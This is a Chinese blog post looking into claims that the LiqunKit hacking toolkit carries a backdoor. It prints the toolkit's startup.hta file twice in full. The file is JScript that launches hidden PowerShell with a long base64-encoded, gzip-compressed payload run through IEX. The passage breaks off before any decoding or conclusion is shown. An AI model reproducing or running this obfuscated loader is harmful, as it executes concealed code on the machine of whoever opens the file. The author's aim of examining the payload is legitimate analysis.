powershell 解码分析の测试（他们说LiqunKit模块插件有后门?） - vulsee.com

起因

不知咋的,群里突然发了些LiqunKit带病毒的截图，然后开始说有后门,异常流量什么的鬼..

刚好前一秒上土司也看到了这工具，

项目地址 https://github.com/Liqunkit/LiqunKit_

———————————————————————————————–

感觉有后门不太科学..而群里的截图也都是截至拉到微步、VT上扫描的截图

都没啥鸟用，张口就来的感觉；本来开发者提供了redis等的利用模块，这黑客工具不是一直都被监控报毒的吗？

下面是文件目录：

作者提供的模块处理redis其他都是文本..然后一堆人都说工具有后门，比如

startup.hta

打开内容如下：

<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADQAKwBpAFMAaAByACsAMwBQADQASwBQAG4AUwBpAFIAcgBzAGIAQgBHADIAZAB6AFMAUQBIAEYAQgBRAEYAVgBQAEMAQwA5AHUAbAAwAHUASgBTAEkASQByAGMAcQBWAEQAZwB6AC8ALwAwAFUAcQBIADEANgBkAG4AcAAyAEoAOQBrADEASQBWAFkAVgA3AC8AVgA1AEwALwBXAGkAQQBmAFMAZwBvAGQAaQAxAGsAQgB6AFkAZwBIAGgAWQBnAEIAaQA2AGcAVQA4ADAAUwBxAFgANwBYAGkAQQBpADQAaQB2AHgAUgA3AG0AMABTAFgAdwBMADUAYwBmADUANABzADAAQgA2AEMAMgBNAEEAKwB2AE4AcwBPADAAWQBRAEUAagA4AFYAYgBxAGIARwBMAEYAeABJAEMAcgAzAFIAeQBOACsATwB3AFIAMgA0AG8ARQA2AFUAVwB4AHkAUQBtAEEAbgBNAGEAagBlADMAWgBYAHUAaQBxAFAARQBoADgAWQBHAHYAUABrAEcAYwBvAC8AZwA3AFEARABRAE4AcgBBAGgAVgBsAFIANQBZAGMATwB3AEYAeAB3AE0AMQAzAC8AOQA4AHEAVwBiAHgARABIAHcAMABXAFgALwAyAEEAZQBJAGgAUgBBAGMAVABNADgARgBzAEYASQBsAHYAaABIAEwATABZAGoAQgB3ADkAagBjAEEAUQBzAFIAZgB4AEgAMwBiADQAOQA5AEwAegBBAE4ANwAwAHEAVwBkAGcAMQByAGkAeAAxAGkAZgBUAHQALwBKAHcAVwBXAGsAWAB2AHcAcQBJAFcAZQBpAHkAcgBsAFAALwA4AHMAVgAxADgAZQBxAE4AZABIAFAAawBvAE0ARAAxAGIASwBXAGcAbwBSAE8ARAB6AGEAbgBsAGUAdQBFAHQAKwByAHUAYwBKAFoARwBvAEoASwBXAFgAYQB0AE8ASQBEAEIAQgBqADAAdQBYAFoAOQB1AFAATQA0AEwANgA1AFgAQwBlAFAAbABpAGUANwBsADYAOQBjAHcASgBEAGUAegBIAHIANQAzAE0AcABWADUANABLAG0AVwA4AG4ARwBCAHMAMgBBAHUARwA1AFQAcgB4AGsAdQB0ADcAZQBYADAAbAAvAG4AaQAzAFIAawAxADgANQBCADcAQQBvACsAZwBqAEUAQQBlAGgAQgB1AEsAagBhAHcASAA0AE8ARABCADgAMgB3AE0AcQAyAEcAQwAyAE0AcwBUAGgAOAA1ADEAeQBGAFIAcwBSAEEANQBUAEUAUABuAEcAegBCAGYATQBkAGcAegAyAG8AMwBQAHUASgA1ADkAVwB4ADMASgBmAGYAbABmAHQAYQBVAGMARABwAEIAdQA3AHYATQBsAFUAKwBNAG0ARwBxAEMAWQBxAHIAOQBXAHQATwAvAEEANABjAGMAcABFADMARgAzAEgAWQBuAFoAKwBzAC8ANQBCAGMAVgBmAHoANwBLAGMARwBxAHAAZQArAGwAVAAxAEwAVgBCAGgANQB3AEQAQQBUAGUARQBNAGIAMwBRADYANgBXADcAdQA1AGUAaQBpAFgAQQAvAGwAUQBtAEEAWABRAEwAdgBxADgARQBXAFMAZABrAGIASQBTAEIAZwBqAGoATgB3AHoAbQBMAEUAMQBCADkALwBTAGMAKwBGADcAVQAzAFQAbABqAC8AcABTAEQAcQB4AG4AWABsAHUAWQBUAG4AWQBzAGQAWAA0AG0AVQBSAHUAUABaAHIANgBhADUAYQB1AG0AWgBQAGYAdgA1AG0ASgBxADUAbgBnAHoAaAAvAC8AKwB0AHEANgBJAEcATgA2ADQATgBlADYAaABzAEgAMQA3AG8AbABmAE8AVwB6AG0ASQBHAE4AQgB3AG8AOABIAG0AOQBrAEMAcgBhAHoAVQByADYAKwBBAEgAYgB2AGkAawA0ADUAQgAvAFQAbABaAHoAYgArADQASwBKADMAWAB1ADUAaQBIAEcAdgBoAHUARQBOAHMARgBVADYASgA2AG8ALwBHAFgARwBKAFkASwBZAHUAKwBEAEEANABZAHYAOABzAGUAcAArAG4AOQBCAHAAYwBaAHUARgBGAGYAUwB5AHUAOQBhAGMALwAzAGUAUwA1ADMAUABRAFAAQwBPAGoARgBKAGMASgAxAGIAZABVAEkARABoAGcAZgBzAE8AcwBIADYAMABMADIAKwBZAGgATQBVAEYATQB2AHkAUAArAGIASwBpAFkAZABjAHkANABEAG8ASgB1ADYAMQArAGcAbQBrAFYAOQBYAGQAdwBNAGMAVgBrADEAZwA0AHUAaABpAEcAbQBSAFkAQwB5AHoAVwA4AEgASgBVADYATQBYAEIAdAB3AEsAVwBhADYAOQB4AE0ASwBIACsASwBTAGQAZgB3AFAARgB4AHkAVwBOAEkAUgB4AHcAUwBmADUARgBoAG8ASwBNACsAWgAyAEsANwAvAGUAMwA1AFUASAB6AFcAQQB4AEUAUABvAGcAUQBPAG0ATAByAHEAUQA0AEIAawBPADcAagBuAFgAaQBpAHIAUwB6AFgAQwBBAFgAZgA0AFAAWgB0AC8AcQA1AEYASQBVAE8AVgBZADMAawBEADQAWQBqAFIATgBBADgAdwBKAFUASgB4AFoAdQBqAEgAQgBmAEsAOQBkAC8AUwByAHoALwB6AGIAdwBmAFcAOAB3AFAAWgBuAFoAagBjAEEAMQBrAHAAUwBqAEUARgB5ADUARgBlAGIAawBVAGwARgBaACsAdQBYAHgAOQB4ADcASgBBAEwAawBZAFkATgBTAEUATwBEAHAAdwBCAFEAWQB2AFIAaQBqAFoAVwBLAGQAUAB0AEoAQgBKAFQAZQBUAGQAdAB4AFgAMwArAEsAQQB5AGkAQQBUAC8ARAB6AHgARQAvAGQAQwBUAHcAawBqAFIAVQBRADAANgBWAEwARAA0AFoAVAB3AGIAawBjAEMATgBPADIAegAwAG0ATwBTAFYAaQBNAHUATgBJAFcAaQBBAHgAWABSAGIAMQArAFkAMQA0AEgAQQBjAHIASwBqAGsAdwBsAEIAMgBLAFIAdwBXAGYAdwBlAGQAbwBBAEgAdgBpAHMAYwBjAE8ARwBsAEUAZwB0AEIAeQAzAGMANQBWAHoANABaACsAYQBKADgAcgBVAFIAZQBIAFoANwBBAHYATQBZAEEARwBGAG4ASAA0AGcASABqAGsAaAA2AG4AWQBDAHYASAA0AFMAagA5ADEAZwBpAFAAbgBhAHIAZABEAG4AVABqAFkARAArAEcARQBMADYASgBKADEAbwBsAEUAYgBHAE0ANAA1AEgAUwAxAHEARwBrAG4AMQBGADYAawBpAEwAZgBoAFEAMABYAHgAYgBNAHEAbQBwAE0ARgBTAHkAUgBvAHAAOQB3AG4ANQBwADkARQBBAGwAYgBmAHgAbwBaADQAOQBhAEIAagBPAHIAQQA2AE4AQgA3AGkALwBnAHAATQBqAHkAaAAwAE4AeABNAEUAeQAxAHAAdQBPAEsAcQBYAEsAeQBTAEUAUgBHAGMAZQBiAFIAawAzAFcAVwBSAG0AMwBNAHIAegBBAFkAawA3AE8AVwB5AGkAcgBUAHMAcwArAFcATABwAHcAcwBYAFoASABTAHcAVQByAHAAWQB4ADEAUgBzAG4AUwBZAGcAUwBJAEYAWgAzAFkAbgB0AHUASwBlAHAAdABtAFoATgBqAHQAVABHAHIAWAAyAGoAbwBaAHUAZABmAHgAVABvAFYAKwB6AHoAeQBkADcARABzAGYARABHAFYAcgBSAEUAKwBQAEEAcABLAG4AZgAwAHMAUwBkAGUASgBhAHMARQBDADMAMABZAFMAcwAyADAAbQA0AG8AdQBjAEQAawBOAGkAaQBYAE8ANQBUAFcAegByAEQARAA0AHoAVwBQAHoAcQBTAG0AcQBhAG0ATgA5AFgAcQBEAFcAVwArAEUAOQBmAHAAZABXAGMAWQArAEcARQAxAGgAdABRAGYAMABaAEwAUgBVAE0AbwB2AG0ASgBDAHUATgBSAGUAegBIAFoATgBSAHkAcwBlAHcAMgBrAG0AbAA4ADMAdQBQAEQANQBwAFMAYgA3ADgANgBkAEoAMQBkACsAVQBqAGYAVABHAFkAdwBhAFUAUABUAE0AbABJAFYAegBhAEcAYwBqAFgAeAArAFAATgBsAHYAUwBiAGIAQwByAGcAOQBaAGcAZAAxAFQAagBLAEEAMAAyAGoAVgBUAHIAUABEAEYAcwB1AHkAOAAxAFoAcABuAEMAbgBrAGkAKwB4AGcAZgBjAEUAKwBPAFAAcgBYADMAQQBEADcATgBhAEoAbgBxAGkAeQBZADgASABzADUAcQBtAG0AcABBADIAbABWAFIAcAB6AFAAbQAxADIAagBzAE0AZQBYAFYAUAA2AGYAMgBwAGsAbQBoADcAVABwADAASgBuAEsAdwB1AHIASgA2AHAAMgB4AGwATAB6AFgAdQA4AFEAOAA0AGsAZAA3ACsATAB0AHkAQgAwADEAcgBJAHAAMQBPAGIARABuAG4AcQBhADYAbABMAGsATQB1AEgAegA1AHIAbQBOAGsAcABUAFYANAAzAFEATgBtAFUAbgBqADAAQQBzAFcAMgA2ADEAagBRAGoASgBPAHkAYwA2AHEAMgAxAHkAcgAvAEoASABlAFIARABKAE4ARAB1AEoAcwBEAFkAUgAxAEcAdwBnADkAMABzAGkAQwByAE4AbgBhAGEAdwAyAFMATgBvADkAYQA2AEUAUwBRADkAZQB5AFcAVAA2AGwAVQBrADYAbABSADAAQgBnAHoAMgBWAEIATAAwAGoARgA3AG0AdABOAG4AUgBWAHYAZwBDAFkATQB6AHEASQBUAFMAWABHAFUASgBaAGoANABjAHoAeQBkAHIATgBlAFgAOQAzAGwASgBSAFYAMABkADYAdwBTAFMAOAA2AE8AdQByADgAYQBZAFIANgBtAEUAcgB6AE4AYgB5AGYARABMAHYAWgBNAHEAQwBhAGUAagBKAGcAVgBwADQAYQBEAHQAcQByAGoAZQBuAFIAUwBnAEoAeAB2AE0AegAzADIAeQB6AEoAMQA3AGIANgAzADEAaABJADQAdgBNAFgAbwBlAEwAcABYAGkAeQAzAEIASABaADcAbgBJAFIAcgA2AHcANAAwACsAZQBNAFoATgBoAFEAbABhAG4AVwBGAEcAVAA1AGsASQBZAHMAdABKAHEAVQAxADUASgAxAGEAZgBqAHMAUwBYADUAMwBlAGUAUwAwAFQAdgBiAEUAeQB5AGsAdwBuAGIATwAwADAAMwBWADIATQBLAEsARgAvAHYATwBTADkATwBiAFQAYwBCAGUAUgBvAHoANQBuAHkAZwB0AHYASwArADIAMwBwADgAawBUAHMAMQBMAE8AeQAyAG0AUQBIAGEAWABGAG8AcQBVAHcAYQBDAFEAdgA1AFcAQgBXAFcAOABsAEsATABXADEATwBCAE0AdABKAFUAawBwADIAMgBaADMAVwBHAFMAOABkAEgAZQBmAGkAMwB0AHYAaABQAE0ANQB3AFQAawB2ADQAMgBZAG0AMABLAGcASABHAFAAcAAxAHgAagBzAEYAaABrAE4AZgBLAFQAagB5AEcAcQBUAFcASwBlAFoAdQBIAE8AeABiAHYAcgBjAEYAQwBrAHMAMQBsAGQATABLAHoAUgBwAGcAbwBlAHQATgB3ADkAbQBMAFMAeABUAFYAdQA5AGsARwB0AEoAMABYAG8AMgBhAEkARgBlAHoAVABiAHIAeABTAFYASABPAHEAcQAwADUAeAByAGUAMgBvAHcARQA5AFIAcABiADgANwBKAE0AMQBjACsAQwAvAFQAQwB6AEQAdgBaAEoAbwBqAHgAYgBIAEwATwA3AC8AdAAvAEUAZgBqAC8AdwBVAFAARQBlADYALwBDAEgAUQBvADMAdgAvAHkAOABWAHEAdgBtAE0AOABQADcAbQA1AGYANwA4ACsAdAB0AHgAbgB2AGYAUAA1AGgAbgBMAEkAMQB1ADUAbgAyAHYAZQBIAE0AMABQAG4AUwA3AFgAdwAxAE8AcwBoAEgARAByAGUASABoAEwAbwBpAEgAbgA5AHYAVgBKAFEAUwB4AGMAQgAxAGgASgBvAEcAYgBjADEAUQBxAG4AMAAvAGQAZQB4AEQANwB3AE0ATQBUAEsAWgA1AFoAYgB3ADIAZgA5AGIAegBBAHkAbwBlAHUAWAAwAHcALwBlAEEAUwA4AEQARwBhAHYAKwBHAEsAYgA0AHkAWABkACsASABSAFYASgBkADQASgA4AGEAUgAxADgAYwBsAE0ATgBwAHQAaQBNAEwAbAA2AGUASgB2AFAAYgBvAFIAZgB2AHEAeQB4AGUALwBVAFAASQBFAHIAQQBkADkAQwAyAFQAcABCAG4AbQBpAFQASgAvAEoAOABoAHEANgBYAGYAaAA2AFUAYgBoAEcAbgBsAFgAVgB3ADkASAA4AHcAKwBXAFAASgBSAGsAMQBkAG8AcQBsADcAUgBqAHgAUAAvAEEAUAA2AFAAQQBmAGgAQgA2AFgAKwBIAE4AZwBlAHYAbQBPADMAZQBvAFMAcwBNACsAaAB5AHYAYQBxAG4AOABSADYAawBrAGIAbwBnAFAANQA5AEQATgA4AEoAYwBMAGkASQBoADIAawBYAHMAUQBHAFQARgA2ADIAQQBVAG0ALwBzAHcAcAA3AHUAMwBLAHYAVgBFAGwAUgBGADQAbgA3AGcAMwBpAE8ALwBHAEEAMwBXAE0AaAAzAGMARABmAE8AcgBHAFQANQBKAGMANABjAGYAbAAwACsAMABhAGMARABQAGYAQwArAEkAMQBRAGcAUQBYAHcANgBQADAAdwBEAEUAeQBjAHAAUQBEAFAAWQByAG4AbwBRAGsAaABPAGoATQAvACsAQgBqAFcANQBTAG8AbwBMAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=");</SCRIPT>

有人就喷：

 -nop -w hidden -encodedcommand 

我就特么想着还原一下不就知道了吗？况且你说人家有后门，就拿着微步/VT的结果嘟囔有啥鬼用?当然，万一有后门呢不是？

开始

原文：

<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADQAKwBpAFMAaAByACsAMwBQADQASwBQAG4AUwBpAFIAcgBzAGIAQgBHADIAZAB6AFMAUQBIAEYAQgBRAEYAVgBQAEMAQwA5AHUAbAAwAHUASgBTAEkASQByAGMAcQBWAEQAZwB6AC8ALwAwAFUAcQBIADEANgBkAG4AcAAyAEoAOQBrADEASQBWAFkAVgA3AC8AVgA1AEwALwBXAGkAQQBmAFMAZwBvAGQAaQAxAGsAQgB6AFkAZwBIAGgAWQBnAEIAaQA2AGcAVQA4ADAAUwBxAFgANwBYAGkAQQBpADQAaQB2AHgAUgA3AG0AMABTAFgAdwBMADUAYwBmADUANABzADAAQgA2AEMAMgBNAEEAKwB2AE4AcwBPADAAWQBRAEUAagA4AFYAYgBxAGIARwBMAEYAeABJAEMAcgAzAFIAeQBOACsATwB3AFIAMgA0AG8ARQA2AFUAVwB4AHkAUQBtAEEAbgBNAGEAagBlADMAWgBYAHUAaQBxAFAARQBoADgAWQBHAHYAUABrAEcAYwBvAC8AZwA3AFEARABRAE4AcgBBAGgAVgBsAFIANQBZAGMATwB3AEYAeAB3AE0AMQAzAC8AOQA4AHEAVwBiAHgARABIAHcAMABXAFgALwAyAEEAZQBJAGgAUgBBAGMAVABNADgARgBzAEYASQBsAHYAaABIAEwATABZAGoAQgB3ADkAagBjAEEAUQBzAFIAZgB4AEgAMwBiADQAOQA5AEwAegBBAE4ANwAwAHEAVwBkAGcAMQByAGkAeAAxAGkAZgBUAHQALwBKAHcAVwBXAGsAWAB2AHcAcQBJAFcAZQBpAHkAcgBsAFAALwA4AHMAVgAxADgAZQBxAE4AZABIAFAAawBvAE0ARAAxAGIASwBXAGcAbwBSAE8ARAB6AGEAbgBsAGUAdQBFAHQAKwByAHUAYwBKAFoARwBvAEoASwBXAFgAYQB0AE8ASQBEAEIAQgBqADAAdQBYAFoAOQB1AFAATQA0AEwANgA1AFgAQwBlAFAAbABpAGUANwBsADYAOQBjAHcASgBEAGUAegBIAHIANQAzAE0AcABWADUANABLAG0AVwA4AG4ARwBCAHMAMgBBAHUARwA1AFQAcgB4AGsAdQB0ADcAZQBYADAAbAAvAG4AaQAzAFIAawAxADgANQBCADcAQQBvACsAZwBqAEUAQQBlAGgAQgB1AEsAagBhAHcASAA0AE8ARABCADgAMgB3AE0AcQAyAEcAQwAyAE0AcwBUAGgAOAA1ADEAeQBGAFIAcwBSAEEANQBUAEUAUABuAEcAegBCAGYATQBkAGcAegAyAG8AMwBQAHUASgA1ADkAVwB4ADMASgBmAGYAbABmAHQAYQBVAGMARABwAEIAdQA3AHYATQBsAFUAKwBNAG0ARwBxAEMAWQBxAHIAOQBXAHQATwAvAEEANABjAGMAcABFADMARgAzAEgAWQBuAFoAKwBzAC8ANQBCAGMAVgBmAHoANwBLAGMARwBxAHAAZQArAGwAVAAxAEwAVgBCAGgANQB3AEQAQQBUAGUARQBNAGIAMwBRADYANgBXADcAdQA1AGUAaQBpAFgAQQAvAGwAUQBtAEEAWABRAEwAdgBxADgARQBXAFMAZABrAGIASQBTAEIAZwBqAGoATgB3AHoAbQBMAEUAMQBCADkALwBTAGMAKwBGADcAVQAzAFQAbABqAC8AcABTAEQAcQB4AG4AWABsAHUAWQBUAG4AWQBzAGQAWAA0AG0AVQBSAHUAUABaAHIANgBhADUAYQB1AG0AWgBQAGYAdgA1AG0ASgBxADUAbgBnAHoAaAAvAC8AKwB0AHEANgBJAEcATgA2ADQATgBlADYAaABzAEgAMQA3AG8AbABmAE8AVwB6AG0ASQBHAE4AQgB3AG8AOABIAG0AOQBrAEMAcgBhAHoAVQByADYAKwBBAEgAYgB2AGkAawA0ADUAQgAvAFQAbABaAHoAYgArADQASwBKADMAWAB1ADUAaQBIAEcAdgBoAHUARQBOAHMARgBVADYASgA2AG8ALwBHAFgARwBKAFkASwBZAHUAKwBEAEEANABZAHYAOABzAGUAcAArAG4AOQBCAHAAYwBaAHUARgBGAGYAUwB5AHUAOQBhAGMALwAzAGUAUwA1ADMAUABRAFAAQwBPAGoARgBKAGMASgAxAGIAZABVAEkARABoAGcAZgBzAE8AcwBIADYAMABMADIAKwBZAGgATQBVAEYATQB2AHkAUAArAGIASwBpAFkAZABjAHkANABEAG8ASgB1ADYAMQArAGcAbQBrAFYAOQBYAGQAdwBNAGMAVgBrADEAZwA0AHUAaABpAEcAbQBSAFkAQwB5AHoAVwA4AEgASgBVADYATQBYAEIAdAB3AEsAVwBhADYAOQB4AE0ASwBIACsASwBTAGQAZgB3AFAARgB4AHkAVwBOAEkAUgB4AHcAUwBmADUARgBoAG8ASwBNACsAWgAyAEsANwAvAGUAMwA1AFUASAB6AFcAQQB4AEUAUABvAGcAUQBPAG0ATAByAHEAUQA0AEIAawBPADcAagBuAFgAaQBpAHIAUwB6AFgAQwBBAFgAZgA0AFAAWgB0AC8AcQA1AEYASQBVAE8AVgBZADMAawBEADQAWQBqAFIATgBBADgAdwBKAFUASgB4AFoAdQBqAEgAQgBmAEsAOQBkAC8AUwByAHoALwB6AGIAdwBmAFcAOAB3AFAAWgBuAFoAagBjAEEAMQBrAHAAUwBqAEUARgB5ADUARgBlAGIAawBVAGwARgBaACsAdQBYAHgAOQB4ADcASgBBAEwAawBZAFkATgBTAEUATwBEAHAAdwBCAFEAWQB2AFIAaQBqAFoAVwBLAGQAUAB0AEoAQgBKAFQAZQBUAGQAdAB4AFgAMwArAEsAQQB5AGkAQQBUAC8ARAB6AHgARQAvAGQAQwBUAHcAawBqAFIAVQBRADAANgBWAEwARAA0AFoAVAB3AGIAawBjAEMATgBPADIAegAwAG0ATwBTAFYAaQBNAHUATgBJAFcAaQBBAHgAWABSAGIAMQArAFkAMQA0AEgAQQBjAHIASwBqAGsAdwBsAEIAMgBLAFIAdwBXAGYAdwBlAGQAbwBBAEgAdgBpAHMAYwBjAE8ARwBsAEUAZwB0AEIAeQAzAGMANQBWAHoANABaACsAYQBKADgAcgBVAFIAZQBIAFoANwBBAHYATQBZAEEARwBGAG4ASAA0AGcASABqAGsAaAA2AG4AWQBDAHYASAA0AFMAagA5ADEAZwBpAFAAbgBhAHIAZABEAG4AVABqAFkARAArAEcARQBMADYASgBKADEAbwBsAEUAYgBHAE0ANAA1AEgAUwAxAHEARwBrAG4AMQBGADYAawBpAEwAZgBoAFEAMABYAHgAYgBNAHEAbQBwAE0ARgBTAHkAUgBvAHAAOQB3AG4ANQBwADkARQBBAGwAYgBmAHgAbwBaADQAOQBhAEIAagBPAHIAQQA2AE4AQgA3AGkALwBnAHAATQBqAHkAaAAwAE4AeABNAEUAeQAxAHAAdQBPAEsAcQBYAEsAeQBTAEUAUgBHAGMAZQBiAFIAawAzAFcAVwBSAG0AMwBNAHIAegBBAFkAawA3AE8AVwB5AGkAcgBUAHMAcwArAFcATABwAHcAcwBYAFoASABTAHcAVQByAHAAWQB4ADEAUgBzAG4AUwBZAGcAUwBJAEYAWgAzAFkAbgB0AHUASwBlAHAAdABtAFoATgBqAHQAVABHAHIAWAAyAGoAbwBaAHUAZABmAHgAVABvAFYAKwB6AHoAeQBkADcARABzAGYARABHAFYAcgBSAEUAKwBQAEEAcABLAG4AZgAwAHMAUwBkAGUASgBhAHMARQBDADMAMABZAFMAcwAyADAAbQA0AG8AdQBjAEQAawBOAGkAaQBYAE8ANQBUAFcAegByAEQARAA0AHoAVwBQAHoAcQBTAG0AcQBhAG0ATgA5AFgAcQBEAFcAVwArAEUAOQBmAHAAZABXAGMAWQArAEcARQAxAGgAdABRAGYAMABaAEwAUgBVAE0AbwB2AG0ASgBDAHUATgBSAGUAegBIAFoATgBSAHkAcwBlAHcAMgBrAG0AbAA4ADMAdQBQAEQANQBwAFMAYgA3ADgANgBkAEoAMQBkACsAVQBqAGYAVABHAFkAdwBhAFUAUABUAE0AbABJAFYAegBhAEcAYwBqAFgAeAArAFAATgBsAHYAUwBiAGIAQwByAGcAOQBaAGcAZAAxAFQAagBLAEEAMAAyAGoAVgBUAHIAUABEAEYAcwB1AHkAOAAxAFoAcABuAEMAbgBrAGkAKwB4AGcAZgBjAEUAKwBPAFAAcgBYADMAQQBEADcATgBhAEoAbgBxAGkAeQBZADgASABzADUAcQBtAG0AcABBADIAbABWAFIAcAB6AFAAbQAxADIAagBzAE0AZQBYAFYAUAA2AGYAMgBwAGsAbQBoADcAVABwADAASgBuAEsAdwB1AHIASgA2AHAAMgB4AGwATAB6AFgAdQA4AFEAOAA0AGsAZAA3ACsATAB0AHkAQgAwADEAcgBJAHAAMQBPAGIARABuAG4AcQBhADYAbABMAGsATQB1AEgAegA1AHIAbQBOAGsAcABUAFYANAAzAFEATgBtAFUAbgBqADAAQQBzAFcAMgA2ADEAagBRAGoASgBPAHkAYwA2AHEAMgAxAHkAcgAvAEoASABlAFIARABKAE4ARAB1AEoAcwBEAFkAUgAxAEcAdwBnADkAMABzAGkAQwByAE4AbgBhAGEAdwAyAFMATgBvADkAYQA2AEUAUwBRADkAZQB5AFcAVAA2AGwAVQBrADYAbABSADAAQgBnAHoAMgBWAEIATAAwAGoARgA3AG0AdABOAG4AUgBWAHYAZwBDAFkATQB6AHEASQBUAFMAWABHAFUASgBaAGoANABjAHoAeQBkAHIATgBlAFgAOQAzAGwASgBSAFYAMABkADYAdwBTAFMAOAA2AE8AdQByADgAYQBZAFIANgBtAEUAcgB6AE4AYgB5AGYARABMAHYAWgBNAHEAQwBhAGUAagBKAGcAVgBwADQAYQBEAHQAcQByAGoAZQBuAFIAUwBnAEoAeAB2AE0AegAzADIAeQB6AEoAMQA3AGIANgAzADEAaABJADQAdgBNAFgAbwBlAEwAcABYAGkAeQAzAEIASABaADcAbgBJAFIAcgA2AHcANAAwACsAZQBNAFoATgBoAFEAbABhAG4AVwBGAEcAVAA1AGsASQBZAHMAdABKAHEAVQAxADUASgAxAGEAZgBqAHMAUwBYADUAMwBlAGUAUwAwAFQAdgBiAEUAeQB5AGsAdwBuAGIATwAwADAAMwBWADIATQBLAEsARgAvAHYATwBTADkATwBiAFQAYwBCAGUAUgBvAHoANQBuAHkAZwB0AHYASwArADIAMwBwADgAawBUAHMAMQBMAE8AeQAyAG0AUQBIAGEAWABGAG8AcQBVAHcAYQBDAFEAdgA1AFcAQgBXAFcAOABsAEsATABXADEATwBCAE0AdABKAFUAawBwADIAMgBaADMAVwBHAFMAOABkAEgAZQBmAGkAMwB0AHYAaABQAE0ANQB3AFQAawB2ADQAMgBZAG0AMABLAGcASABHAFAAcAAxAHgAagBzAEYAaABrAE4AZgBLAFQAagB5AEcAcQBUAFcASwBlAFoAdQBIAE8AeABiAHYAcgBjAEYAQwBrAHMAMQBsAGQATABLAHoAUgBwAGcAbwBlAHQATgB3ADkAbQBMAFMAeABUAFYAdQA5AGsARwB0AEoAMABYAG8AMgBhAEkARgBlAHoAVABiAHIAeABTAFYASABPAHEAcQAwADUAeAByAGUAMgBvAHcARQA5AFIAcABiADgANwBKAE0AMQBjACsAQwAvAFQAQwB6AEQAdgBaAEoAbwBqAHgAYgBIAEwATwA3AC8AdAAvAEUAZgBqAC8AdwBVAFAARQBlADYALwBDAEgAUQBvADMAdgAvAHkAOABWAHEAdgBtAE0AOABQADcAbQA1AGYANwA4ACsAdAB0AHgAbgB2AGYAUAA1AGgAbgBMAEkAMQB1ADUAbgAyAHYAZQBIAE0AMABQAG4AUwA3AFgAdwAxAE8AcwBoAEgARAByAGUASABoAEwAbwBpAEgAbgA5AHYAVgBKAFEAUwB4AGMAQgAxAGgASgBvAEcAYgBjADEAUQBxAG4AMAAvAGQAZQB4AEQANwB3AE0ATQBUAEsAWgA1AFoAYgB3ADIAZgA5AGIAegBBAHkAbwBlAHUAWAAwAHcALwBlAEEAUwA4AEQARwBhAHYAKwBHAEsAYgA0AHkAWABkACsASABSAFYASgBkADQASgA4AGEAUgAxADgAYwBsAE0ATgBwAHQAaQBNAEwAbAA2AGUASgB2AFAAYgBvAFIAZgB2AHEAeQB4AGUALwBVAFAASQBFAHIAQQBkADkAQwAyAFQAcABCAG4AbQBpAFQASgAvAEoAOABoAHEANgBYAGYAaAA2AFUAYgBoAEcAbgBsAFgAVgB3ADkASAA4AHcAKwBXAFAASgBSAGsAMQBkAG8AcQBsADcAUgBqAHgAUAAvAEEAUAA2AFAAQQBmAGgAQgA2AFgAKwBIAE4AZwBlAHYAbQBPADMAZQBvAFMAcwBNACsAaAB5AHYAYQBxAG4AOABSADYAawBrAGIAbwBnAFAANQA5AEQATgA4AEoAYwBMAGkASQBoADIAawBYAHMAUQBHAFQARgA2ADIAQQBVAG0ALwBzAHcAcAA3AHUAMwBLAHYAVgBFAGwAUgBGADQAbgA3AGcAMwBpAE8ALwBHAEEAMwBXAE0AaAAzAGMARABmAE8AcgBHAFQANQBKAGMANABjAGYAbAAwACsAMABhAGMARABQAGYAQwArAEkAMQBRAGcAUQBYAHcANgBQADAAdwBEAEUAeQBjAHAAUQBEAFAAWQByAG4AbwBRAGsAaABPAGoATQAvACsAQgBqAFcANQBTAG8AbwBMAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=");</SCRIPT>

对

